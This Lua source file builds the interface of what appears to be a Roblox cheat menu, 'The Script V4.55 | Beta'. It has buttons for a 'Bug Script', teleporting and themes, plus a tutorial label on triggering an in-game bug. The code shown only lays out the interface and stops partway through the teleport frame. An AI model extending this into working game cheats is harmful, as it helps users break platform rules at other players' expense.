local TheGui = Instance.new("ScreenGui")
local TheMain = Instance.new("Frame")
local Bar1 = Instance.new("Frame")
local Bar2 = Instance.new("Frame")
local Or = Instance.new("TextLabel")
local TheScript = Instance.new("TextLabel")
local Execute = Instance.new("TextButton")
local Created = Instance.new("TextLabel")
local Tutorial = Instance.new("TextButton")
local Themes = Instance.new("TextButton")
local Thanks = Instance.new("TextLabel")
local Credits = Instance.new("TextButton")
local ForTheBugTutorialV1 = Instance.new("Frame")
local Bar3 = Instance.new("Frame")
local Bar4 = Instance.new("Frame")
local Leave = Instance.new("TextButton")
local How = Instance.new("TextLabel")
local V = Instance.new("TextLabel")
local ForExecute = Instance.new("Frame")
local Bug = Instance.new("TextButton")
local Bar5 = Instance.new("Frame")
local Go = Instance.new("TextButton")
local Bar6 = Instance.new("Frame")
local A = Instance.new("TextLabel")
local TeleportToArea = Instance.new("TextButton")
local ComingSoon2 = Instance.new("TextButton")
local ComingSoon3 = Instance.new("TextButton")
local ComingSoon4 = Instance.new("TextButton")
local ComingSoon5 = Instance.new("TextButton")
local ComingSoon6 = Instance.new("TextButton")
local ComingSoon7 = Instance.new("TextButton")
local ComingSoon8 = Instance.new("TextButton")
local ComingSoon9 = Instance.new("TextButton")
local TheTutorialMain = Instance.new("Frame")
local Bar7 = Instance.new("Frame")
local ScriptV = Instance.new("TextLabel")
local Away = Instance.new("TextButton")
local What = Instance.new("TextLabel")
local Bar8 = Instance.new("Frame")
local BugTutorial = Instance.new("TextButton")
local ComingSoon11 = Instance.new("TextButton")
local TeleportTutorial = Instance.new("TextButton")
local ComingSoon12 = Instance.new("TextButton")
local ComingSoon13 = Instance.new("TextButton")
local ComingSoon14 = Instance.new("TextButton")
local ComingSoon15 = Instance.new("TextButton")
local ComingSoon16 = Instance.new("TextButton")
local TeleportMain = Instance.new("Frame")
local Earth = Instance.new("TextButton")
local Bar9 = Instance.new("Frame")
local Bar10 = Instance.new("Frame")
local Text = Instance.new("TextLabel")
local Bye = Instance.new("TextButton")
local WhereYouAre = Instance.new("TextLabel")
local Namek = Instance.new("TextButton")
local Space = Instance.new("TextButton")
local Future = Instance.new("TextButton")
local EarthTeleport = Instance.new("Frame")
local Bar11 = Instance.new("Frame")
local Bar14 = Instance.new("Frame")
local Oof = Instance.new("TextLabel")
local WestCity = Instance.new("TextButton")
local Exat = Instance.new("TextButton")
local Tuxt = Instance.new("TextLabel")
local CentralCity = Instance.new("TextButton")
local SatanCity = Instance.new("TextButton")
local HTC = Instance.new("TextButton")
local Tournament = Instance.new("TextButton")
local Namak = Instance.new("TextButton")
local Spece = Instance.new("TextButton")
local Futare = Instance.new("TextButton")
local ForTheTeleportTutorial = Instance.new("Frame")
local Bar12 = Instance.new("Frame")
local Bar13 = Instance.new("Frame")
local Bai = Instance.new("TextButton")
local Tele = Instance.new("TextLabel")
local F = Instance.new("TextLabel")
local Open = Instance.new("TextButton")
local Close = Instance.new("TextButton")
local ThemesMain = Instance.new("Frame")
local Bar15 = Instance.new("Frame")
local Bar16 = Instance.new("Frame")
local Aaf = Instance.new("TextLabel")
local Tixt = Instance.new("TextLabel")
local BlackTheme = Instance.new("TextButton")
local WhiteTheme = Instance.new("TextButton")
local Die = Instance.new("TextButton")
local NamekTeleport = Instance.new("Frame")
local Bar17 = Instance.new("Frame")
local Bar18 = Instance.new("Frame")
local Iif = Instance.new("TextLabel")
local Frieza = Instance.new("TextButton")
local Exot = Instance.new("TextButton")
local Texto = Instance.new("TextLabel")
local SecretArea = Instance.new("TextButton")
local Guldos = Instance.new("TextButton")
local Captain = Instance.new("TextButton")
local Jeice = Instance.new("TextButton")
local Recoome = Instance.new("TextButton")
local Universal = Instance.new("TextButton")
local Terra = Instance.new("TextButton")
local Burter = Instance.new("TextButton")
local Sure = Instance.new("Frame")
local Are = Instance.new("TextLabel")
local Yes = Instance.new("TextButton")
local No = Instance.new("TextButton")
local Bar19 = Instance.new("Frame")
local Bar20 = Instance.new("Frame")
local kms = Instance.new("TextLabel")
local Destroy = Instance.new("TextButton")
local BugMain = Instance.new("Frame")
local Bar21 = Instance.new("Frame")
local Bar22 = Instance.new("Frame")
local Textinha = Instance.new("TextLabel")
local BugScriptV1 = Instance.new("TextButton")
local Okiu = Instance.new("TextLabel")
local BugScriptV2 = Instance.new("TextButton")
local _4ttf = Instance.new("TextButton")
local ForTheBugTutorialV2 = Instance.new("Frame")
local Bar25 = Instance.new("Frame")
local Bar26 = Instance.new("Frame")
local asd3d = Instance.new("TextButton")
local poo = Instance.new("TextLabel")
local Z = Instance.new("TextLabel")
local TutorialBugMain = Instance.new("Frame")
local Bar23 = Instance.new("Frame")
local Bar24 = Instance.new("Frame")
local PodeSer = Instance.new("TextLabel")
local BugScriptV11 = Instance.new("TextButton")
local ab46 = Instance.new("TextLabel")
local BugScriptV22 = Instance.new("TextButton")
local _56u56h1 = Instance.new("TextButton")
local CreditsMain = Instance.new("Frame")
local Bar29 = Instance.new("Frame")
local Bar30 = Instance.new("Frame")
local ApenasUmTexto = Instance.new("TextLabel")
local Vlw = Instance.new("TextLabel")
local Saidinha = Instance.new("TextButton")

-- Properties

TheGui.Name = "TheGui"
TheGui.Parent = game.CoreGui

TheMain.Name = "TheMain"
TheMain.Parent = TheGui
TheMain.Active = true
TheMain.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
TheMain.Draggable = true
TheMain.Position = UDim2.new(0.361769378, 0, 0.115191974, 0)
TheMain.Selectable = true
TheMain.Size = UDim2.new(0, 349, 0, 460)
TheMain.Visible = false

Bar1.Name = "Bar1"
Bar1.Parent = TheMain
Bar1.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Bar1.BorderSizePixel = 0
Bar1.Size = UDim2.new(0, 349, 0, 29)

Bar2.Name = "Bar2"
Bar2.Parent = TheMain
Bar2.BackgroundColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Bar2.BorderSizePixel = 0
Bar2.Position = UDim2.new(-0.00119501352, 0, 0.0564600378, 0)
Bar2.Size = UDim2.new(0, 349, 0, 6)

Or.Name = "Or"
Or.Parent = TheMain
Or.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
Or.BorderSizePixel = 0
Or.Position = UDim2.new(0.21203436, 0, 0.446739107, 0)
Or.Size = UDim2.new(0, 200, 0, 50)
Or.Font = Enum.Font.SourceSans
Or.Text = "Or"
Or.TextColor3 = Color3.new(1, 1, 1)
Or.TextScaled = true
Or.TextSize = 14
Or.TextWrapped = true

TheScript.Name = "TheScript"
TheScript.Parent = TheMain
TheScript.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
TheScript.BorderSizePixel = 0
TheScript.Size = UDim2.new(0, 146, 0, 26)
TheScript.Font = Enum.Font.SourceSans
TheScript.Text = "The Script V4.55 | Beta"
TheScript.TextColor3 = Color3.new(1, 1, 1)
TheScript.TextScaled = true
TheScript.TextSize = 14
TheScript.TextWrapped = true

Execute.Name = "Open"
Execute.Parent = TheMain
Execute.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Execute.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Execute.BorderSizePixel = 4
Execute.Position = UDim2.new(0.212034389, 0, 0.160869569, 0)
Execute.Size = UDim2.new(0, 200, 0, 50)
Execute.Font = Enum.Font.SourceSansBold
Execute.Text = "Open"
Execute.TextColor3 = Color3.new(1, 1, 1)
Execute.TextScaled = true
Execute.TextSize = 14
Execute.TextWrapped = true

Created.Name = "Created"
Created.Parent = TheMain
Created.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
Created.BorderSizePixel = 0
Created.Position = UDim2.new(0, 0, 0.943478286, 0)
Created.Size = UDim2.new(0, 136, 0, 26)
Created.Font = Enum.Font.SourceSans
Created.Text = "Created By WeAreEvils"
Created.TextColor3 = Color3.new(1, 1, 1)
Created.TextScaled = true
Created.TextSize = 14
Created.TextWrapped = true

Tutorial.Name = "Tutorial"
Tutorial.Parent = TheMain
Tutorial.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Tutorial.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Tutorial.BorderSizePixel = 4
Tutorial.Position = UDim2.new(0.0343839563, 0, 0.650000036, 0)
Tutorial.Size = UDim2.new(0, 157, 0, 50)
Tutorial.Font = Enum.Font.SourceSansBold
Tutorial.Text = "Tutorial"
Tutorial.TextColor3 = Color3.new(1, 1, 1)
Tutorial.TextScaled = true
Tutorial.TextSize = 14
Tutorial.TextWrapped = true

Themes.Name = "Themes"
Themes.Parent = TheMain
Themes.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Themes.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Themes.BorderSizePixel = 4
Themes.Position = UDim2.new(0.540523231, 0, 0.649999976, 0)
Themes.Size = UDim2.new(0, 148, 0, 50)
Themes.Font = Enum.Font.SourceSansBold
Themes.Text = "Themes"
Themes.TextColor3 = Color3.new(1, 1, 1)
Themes.TextScaled = true
Themes.TextSize = 14
Themes.TextWrapped = true

Thanks.Name = "Thanks"
Thanks.Parent = TheMain
Thanks.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
Thanks.BorderSizePixel = 0
Thanks.Position = UDim2.new(0.610315204, 0, 0.943478286, 0)
Thanks.Size = UDim2.new(0, 136, 0, 26)
Thanks.Font = Enum.Font.SourceSans
Thanks.Text = "Thanks to my Community"
Thanks.TextColor3 = Color3.new(1, 1, 1)
Thanks.TextScaled = true
Thanks.TextSize = 14
Thanks.TextWrapped = true

Credits.Name = "Credits"
Credits.Parent = TheMain
Credits.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Credits.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Credits.BorderSizePixel = 4
Credits.Position = UDim2.new(0.275071651, 0, 0.810869575, 0)
Credits.Size = UDim2.new(0, 157, 0, 50)
Credits.Font = Enum.Font.SourceSansBold
Credits.Text = "Credits"
Credits.TextColor3 = Color3.new(1, 1, 1)
Credits.TextScaled = true
Credits.TextSize = 14
Credits.TextWrapped = true

ForTheBugTutorialV1.Name = "ForTheBugTutorialV1"
ForTheBugTutorialV1.Parent = TheGui
ForTheBugTutorialV1.Active = true
ForTheBugTutorialV1.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
ForTheBugTutorialV1.BorderSizePixel = 0
ForTheBugTutorialV1.Draggable = true
ForTheBugTutorialV1.Position = UDim2.new(0.361999989, 0, 0.115000002, 0)
ForTheBugTutorialV1.Selectable = true
ForTheBugTutorialV1.Size = UDim2.new(0, 470, 0, 454)
ForTheBugTutorialV1.Visible = false

Bar3.Name = "Bar3"
Bar3.Parent = ForTheBugTutorialV1
Bar3.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Bar3.BorderSizePixel = 0
Bar3.Size = UDim2.new(0, 470, 0, 40)

Bar4.Name = "Bar4"
Bar4.Parent = ForTheBugTutorialV1
Bar4.BackgroundColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Bar4.BorderSizePixel = 0
Bar4.Position = UDim2.new(0, 0, 0.0881057233, 0)
Bar4.Size = UDim2.new(0, 470, 0, 6)

Leave.Name = "Leave"
Leave.Parent = ForTheBugTutorialV1
Leave.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Leave.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Leave.BorderSizePixel = 0
Leave.Position = UDim2.new(0.928848386, 0, 0.0307220854, 0)
Leave.Size = UDim2.new(0, 33, 0, 22)
Leave.Font = Enum.Font.SourceSansBold
Leave.Text = "X"
Leave.TextColor3 = Color3.new(1, 1, 1)
Leave.TextScaled = true
Leave.TextSize = 14
Leave.TextWrapped = true

How.Name = "How"
How.Parent = ForTheBugTutorialV1
How.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
How.BorderSizePixel = 0
How.Position = UDim2.new(0.00638297852, 0, 0.101321585, 0)
How.Size = UDim2.new(0, 464, 0, 408)
How.Font = Enum.Font.SourceSans
How.Text = "(If you have Dragon Throw go to number 7)\n1. Click M\n2. Click On Shop\n3. Click On Melee\n4. Click On The Dragon Throw\n5. Buy it\n6. Leave From The Shop\n7. Go To Skills\n8. Go To Melee\n9. Click On The Dragon Throw\n10. Equip It\n11. Use It On Someone Or In Any Npc\n12. Click B When You Use It\n13. Done!, Enjoy"
How.TextColor3 = Color3.new(0.207843, 0.690196, 0)
How.TextScaled = true
How.TextSize = 14
How.TextWrapped = true

V.Name = "V"
V.Parent = ForTheBugTutorialV1
V.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
V.BorderSizePixel = 0
V.Position = UDim2.new(0.00600000005, 0, 0.0149999997, 0)
V.Size = UDim2.new(0, 154, 0, 26)
V.Font = Enum.Font.SourceSans
V.Text = "The Script V4.5 | Beta"
V.TextColor3 = Color3.new(1, 1, 1)
V.TextScaled = true
V.TextSize = 14
V.TextWrapped = true

ForExecute.Name = "ForExecute"
ForExecute.Parent = TheGui
ForExecute.Active = true
ForExecute.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
ForExecute.Draggable = true
ForExecute.Position = UDim2.new(0.361999989, 0, 0.115000002, 0)
ForExecute.Selectable = true
ForExecute.Size = UDim2.new(0, 449, 0, 452)
ForExecute.Visible = false

Bug.Name = "Bug"
Bug.Parent = ForExecute
Bug.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Bug.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Bug.BorderSizePixel = 4
Bug.Position = UDim2.new(0.0200445428, 0, 0.130530983, 0)
Bug.Size = UDim2.new(0, 178, 0, 44)
Bug.Font = Enum.Font.SourceSansBold
Bug.Text = "Bug Script"
Bug.TextColor3 = Color3.new(1, 1, 1)
Bug.TextScaled = true
Bug.TextSize = 14
Bug.TextWrapped = true

Bar5.Name = "Bar5"
Bar5.Parent = ForExecute
Bar5.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Bar5.BorderSizePixel = 0
Bar5.Size = UDim2.new(0, 449, 0, 38)

Go.Name = "Go"
Go.Parent = ForExecute
Go.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Go.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Go.BorderSizePixel = 0
Go.Position = UDim2.new(0.926621199, 0, 0.0196601376, 0)
Go.Size = UDim2.new(0, 33, 0, 22)
Go.Font = Enum.Font.SourceSansBold
Go.Text = "X"
Go.TextColor3 = Color3.new(1, 1, 1)
Go.TextScaled = true
Go.TextSize = 14
Go.TextWrapped = true

Bar6.Name = "Bar6"
Bar6.Parent = ForExecute
Bar6.BackgroundColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Bar6.BorderSizePixel = 0
Bar6.Position = UDim2.new(0, 0, 0.0840707943, 0)
Bar6.Size = UDim2.new(0, 449, 0, 6)

A.Name = "A"
A.Parent = ForExecute
A.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
A.BorderSizePixel = 0
A.Position = UDim2.new(0, 0, 0.0110619469, 0)
A.Size = UDim2.new(0, 151, 0, 26)
A.Font = Enum.Font.SourceSans
A.Text = "The Script V4.5 | Beta"
A.TextColor3 = Color3.new(1, 1, 1)
A.TextScaled = true
A.TextSize = 14
A.TextWrapped = true

TeleportToArea.Name = "TeleportToArea"
TeleportToArea.Parent = ForExecute
TeleportToArea.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
TeleportToArea.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
TeleportToArea.BorderSizePixel = 4
TeleportToArea.Position = UDim2.new(0.583518982, 0, 0.130530983, 0)
TeleportToArea.Size = UDim2.new(0, 178, 0, 44)
TeleportToArea.Font = Enum.Font.SourceSansBold
TeleportToArea.Text = "Teleport To Area"
TeleportToArea.TextColor3 = Color3.new(1, 1, 1)
TeleportToArea.TextScaled = true
TeleportToArea.TextSize = 14
TeleportToArea.TextWrapped = true

ComingSoon2.Name = "ComingSoon2"
ComingSoon2.Parent = ForExecute
ComingSoon2.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
ComingSoon2.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
ComingSoon2.BorderSizePixel = 4
ComingSoon2.Position = UDim2.new(0.0200445652, 0, 0.311946929, 0)
ComingSoon2.Size = UDim2.new(0, 178, 0, 44)
ComingSoon2.Font = Enum.Font.SourceSansBold
ComingSoon2.Text = "Coming Soon"
ComingSoon2.TextColor3 = Color3.new(1, 1, 1)
ComingSoon2.TextScaled = true
ComingSoon2.TextSize = 14
ComingSoon2.TextWrapped = true

ComingSoon3.Name = "ComingSoon3"
ComingSoon3.Parent = ForExecute
ComingSoon3.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
ComingSoon3.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
ComingSoon3.BorderSizePixel = 4
ComingSoon3.Position = UDim2.new(0.584169924, 0, 0.312825948, 0)
ComingSoon3.Size = UDim2.new(0, 178, 0, 44)
ComingSoon3.Font = Enum.Font.SourceSansBold
ComingSoon3.Text = "Coming Soon"
ComingSoon3.TextColor3 = Color3.new(1, 1, 1)
ComingSoon3.TextScaled = true
ComingSoon3.TextSize = 14
ComingSoon3.TextWrapped = true

ComingSoon4.Name = "ComingSoon4"
ComingSoon4.Parent = ForExecute
ComingSoon4.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
ComingSoon4.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
ComingSoon4.BorderSizePixel = 4
ComingSoon4.Position = UDim2.new(0.0200445652, 0, 0.486725688, 0)
ComingSoon4.Size = UDim2.new(0, 178, 0, 44)
ComingSoon4.Font = Enum.Font.SourceSansBold
ComingSoon4.Text = "Coming Soon"
ComingSoon4.TextColor3 = Color3.new(1, 1, 1)
ComingSoon4.TextScaled = true
ComingSoon4.TextSize = 14
ComingSoon4.TextWrapped = true

ComingSoon5.Name = "ComingSoon5"
ComingSoon5.Parent = ForExecute
ComingSoon5.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
ComingSoon5.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
ComingSoon5.BorderSizePixel = 4
ComingSoon5.Position = UDim2.new(0.583518982, 0, 0.486725688, 0)
ComingSoon5.Size = UDim2.new(0, 178, 0, 44)
ComingSoon5.Font = Enum.Font.SourceSansBold
ComingSoon5.Text = "Coming Soon"
ComingSoon5.TextColor3 = Color3.new(1, 1, 1)
ComingSoon5.TextScaled = true
ComingSoon5.TextSize = 14
ComingSoon5.TextWrapped = true

ComingSoon6.Name = "ComingSoon6"
ComingSoon6.Parent = ForExecute
ComingSoon6.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
ComingSoon6.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
ComingSoon6.BorderSizePixel = 4
ComingSoon6.Position = UDim2.new(0.0195783973, 0, 0.655761063, 0)
ComingSoon6.Size = UDim2.new(0, 178, 0, 44)
ComingSoon6.Font = Enum.Font.SourceSansBold
ComingSoon6.Text = "Coming Soon"
ComingSoon6.TextColor3 = Color3.new(1, 1, 1)
ComingSoon6.TextScaled = true
ComingSoon6.TextSize = 14
ComingSoon6.TextWrapped = true

ComingSoon7.Name = "ComingSoon7"
ComingSoon7.Parent = ForExecute
ComingSoon7.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
ComingSoon7.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
ComingSoon7.BorderSizePixel = 4
ComingSoon7.Position = UDim2.new(0.583052814, 0, 0.664610624, 0)
ComingSoon7.Size = UDim2.new(0, 178, 0, 44)
ComingSoon7.Font = Enum.Font.SourceSansBold
ComingSoon7.Text = "Coming Soon"
ComingSoon7.TextColor3 = Color3.new(1, 1, 1)
ComingSoon7.TextScaled = true
ComingSoon7.TextSize = 14
ComingSoon7.TextWrapped = true

ComingSoon8.Name = "ComingSoon8"
ComingSoon8.Parent = ForExecute
ComingSoon8.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
ComingSoon8.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
ComingSoon8.BorderSizePixel = 4
ComingSoon8.Position = UDim2.new(0.0195783973, 0, 0.837176979, 0)
ComingSoon8.Size = UDim2.new(0, 178, 0, 44)
ComingSoon8.Font = Enum.Font.SourceSansBold
ComingSoon8.Text = "Coming Soon"
ComingSoon8.TextColor3 = Color3.new(1, 1, 1)
ComingSoon8.TextScaled = true
ComingSoon8.TextSize = 14
ComingSoon8.TextWrapped = true

ComingSoon9.Name = "ComingSoon9"
ComingSoon9.Parent = ForExecute
ComingSoon9.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
ComingSoon9.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
ComingSoon9.BorderSizePixel = 4
ComingSoon9.Position = UDim2.new(0.583052814, 0, 0.837176979, 0)
ComingSoon9.Size = UDim2.new(0, 178, 0, 44)
ComingSoon9.Font = Enum.Font.SourceSansBold
ComingSoon9.Text = "Coming Soon"
ComingSoon9.TextColor3 = Color3.new(1, 1, 1)
ComingSoon9.TextScaled = true
ComingSoon9.TextSize = 14
ComingSoon9.TextWrapped = true

TheTutorialMain.Name = "TheTutorialMain"
TheTutorialMain.Parent = TheGui
TheTutorialMain.Active = true
TheTutorialMain.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
TheTutorialMain.BorderSizePixel = 0
TheTutorialMain.Draggable = true
TheTutorialMain.Position = UDim2.new(0.361999989, 0, 0.115000002, 0)
TheTutorialMain.Selectable = true
TheTutorialMain.Size = UDim2.new(0, 485, 0, 456)
TheTutorialMain.Visible = false

Bar7.Name = "Bar7"
Bar7.Parent = TheTutorialMain
Bar7.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Bar7.BorderSizePixel = 0
Bar7.Size = UDim2.new(0, 485, 0, 38)

ScriptV.Name = "ScriptV"
ScriptV.Parent = TheTutorialMain
ScriptV.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
ScriptV.BorderSizePixel = 0
ScriptV.Size = UDim2.new(0, 151, 0, 26)
ScriptV.Font = Enum.Font.SourceSans
ScriptV.Text = "The Script V4.5 | Beta"
ScriptV.TextColor3 = Color3.new(1, 1, 1)
ScriptV.TextScaled = true
ScriptV.TextSize = 14
ScriptV.TextWrapped = true

Away.Name = "Away"
Away.Parent = TheTutorialMain
Away.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Away.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Away.BorderSizePixel = 0
Away.Position = UDim2.new(0.919877112, 0, 0.0174675807, 0)
Away.Size = UDim2.new(0, 33, 0, 22)
Away.Font = Enum.Font.SourceSansBold
Away.Text = "X"
Away.TextColor3 = Color3.new(1, 1, 1)
Away.TextScaled = true
Away.TextSize = 14
Away.TextWrapped = true

What.Name = "What"
What.Parent = TheTutorialMain
What.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
What.BorderSizePixel = 0
What.Position = UDim2.new(0.156701028, 0, 0.0833333358, 0)
What.Size = UDim2.new(0, 327, 0, 49)
What.Font = Enum.Font.SourceSans
What.Text = "What Tutorial You Would Like To See?"
What.TextColor3 = Color3.new(1, 1, 1)
What.TextScaled = true
What.TextSize = 25
What.TextWrapped = true

Bar8.Name = "Bar8"
Bar8.Parent = TheTutorialMain
Bar8.BackgroundColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Bar8.BorderSizePixel = 0
Bar8.Position = UDim2.new(0, 0, 0.0701754391, 0)
Bar8.Size = UDim2.new(0, 479, 0, 6)

BugTutorial.Name = "BugTutorial"
BugTutorial.Parent = TheTutorialMain
BugTutorial.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
BugTutorial.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
BugTutorial.BorderSizePixel = 4
BugTutorial.Position = UDim2.new(0.0399346054, 0, 0.215349972, 0)
BugTutorial.Size = UDim2.new(0, 200, 0, 50)
BugTutorial.Font = Enum.Font.SourceSansBold
BugTutorial.Text = "Bug Script"
BugTutorial.TextColor3 = Color3.new(1, 1, 1)
BugTutorial.TextScaled = true
BugTutorial.TextSize = 14
BugTutorial.TextWrapped = true

ComingSoon11.Name = "ComingSoon11"
ComingSoon11.Parent = TheTutorialMain
ComingSoon11.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
ComingSoon11.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
ComingSoon11.BorderSizePixel = 4
ComingSoon11.Position = UDim2.new(0.0391752571, 0, 0.410087705, 0)
ComingSoon11.Size = UDim2.new(0, 200, 0, 50)
ComingSoon11.Font = Enum.Font.SourceSansBold
ComingSoon11.Text = "Coming Soon"
ComingSoon11.TextColor3 = Color3.new(1, 1, 1)
ComingSoon11.TextScaled = true
ComingSoon11.TextSize = 14
ComingSoon11.TextWrapped = true

TeleportTutorial.Name = "TeleportTutorial"
TeleportTutorial.Parent = TheTutorialMain
TeleportTutorial.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
TeleportTutorial.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
TeleportTutorial.BorderSizePixel = 4
TeleportTutorial.Position = UDim2.new(0.562886596, 0, 0.214912266, 0)
TeleportTutorial.Size = UDim2.new(0, 200, 0, 50)
TeleportTutorial.Font = Enum.Font.SourceSansBold
TeleportTutorial.Text = "Teleport To Area"
TeleportTutorial.TextColor3 = Color3.new(1, 1, 1)
TeleportTutorial.TextScaled = true
TeleportTutorial.TextSize = 14
TeleportTutorial.TextWrapped = true

ComingSoon12.Name = "ComingSoon12"
ComingSoon12.Parent = TheTutorialMain
ComingSoon12.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
ComingSoon12.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
ComingSoon12.BorderSizePixel = 4
ComingSoon12.Position = UDim2.new(0.562886596, 0, 0.410087705, 0)
ComingSoon12.Size = UDim2.new(0, 200, 0, 50)
ComingSoon12.Font = Enum.Font.SourceSansBold
ComingSoon12.Text = "Coming Soon"
ComingSoon12.TextColor3 = Color3.new(1, 1, 1)
ComingSoon12.TextScaled = true
ComingSoon12.TextSize = 14
ComingSoon12.TextWrapped = true

ComingSoon13.Name = "ComingSoon13"
ComingSoon13.Parent = TheTutorialMain
ComingSoon13.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
ComingSoon13.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
ComingSoon13.BorderSizePixel = 4
ComingSoon13.Position = UDim2.new(0.039175272, 0, 0.605263114, 0)
ComingSoon13.Size = UDim2.new(0, 200, 0, 50)
ComingSoon13.Font = Enum.Font.SourceSansBold
ComingSoon13.Text = "Coming Soon"
ComingSoon13.TextColor3 = Color3.new(1, 1, 1)
ComingSoon13.TextScaled = true
ComingSoon13.TextSize = 14
ComingSoon13.TextWrapped = true

ComingSoon14.Name = "ComingSoon14"
ComingSoon14.Parent = TheTutorialMain
ComingSoon14.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
ComingSoon14.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
ComingSoon14.BorderSizePixel = 4
ComingSoon14.Position = UDim2.new(0.562886596, 0, 0.605263114, 0)
ComingSoon14.Size = UDim2.new(0, 200, 0, 50)
ComingSoon14.Font = Enum.Font.SourceSansBold
ComingSoon14.Text = "Coming Soon"
ComingSoon14.TextColor3 = Color3.new(1, 1, 1)
ComingSoon14.TextScaled = true
ComingSoon14.TextSize = 14
ComingSoon14.TextWrapped = true

ComingSoon15.Name = "ComingSoon15"
ComingSoon15.Parent = TheTutorialMain
ComingSoon15.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
ComingSoon15.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
ComingSoon15.BorderSizePixel = 4
ComingSoon15.Position = UDim2.new(0.562886596, 0, 0.802631557, 0)
ComingSoon15.Size = UDim2.new(0, 200, 0, 50)
ComingSoon15.Font = Enum.Font.SourceSansBold
ComingSoon15.Text = "Coming Soon"
ComingSoon15.TextColor3 = Color3.new(1, 1, 1)
ComingSoon15.TextScaled = true
ComingSoon15.TextSize = 14
ComingSoon15.TextWrapped = true

ComingSoon16.Name = "ComingSoon16"
ComingSoon16.Parent = TheTutorialMain
ComingSoon16.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
ComingSoon16.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
ComingSoon16.BorderSizePixel = 4
ComingSoon16.Position = UDim2.new(0.0387600064, 0, 0.802840233, 0)
ComingSoon16.Size = UDim2.new(0, 200, 0, 50)
ComingSoon16.Font = Enum.Font.SourceSansBold
ComingSoon16.Text = "Coming Soon"
ComingSoon16.TextColor3 = Color3.new(1, 1, 1)
ComingSoon16.TextScaled = true
ComingSoon16.TextSize = 14
ComingSoon16.TextWrapped = true

TeleportMain.Name = "TeleportMain"
TeleportMain.Parent = TheGui
TeleportMain.Active = true
TeleportMain.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
TeleportMain.Draggable = true
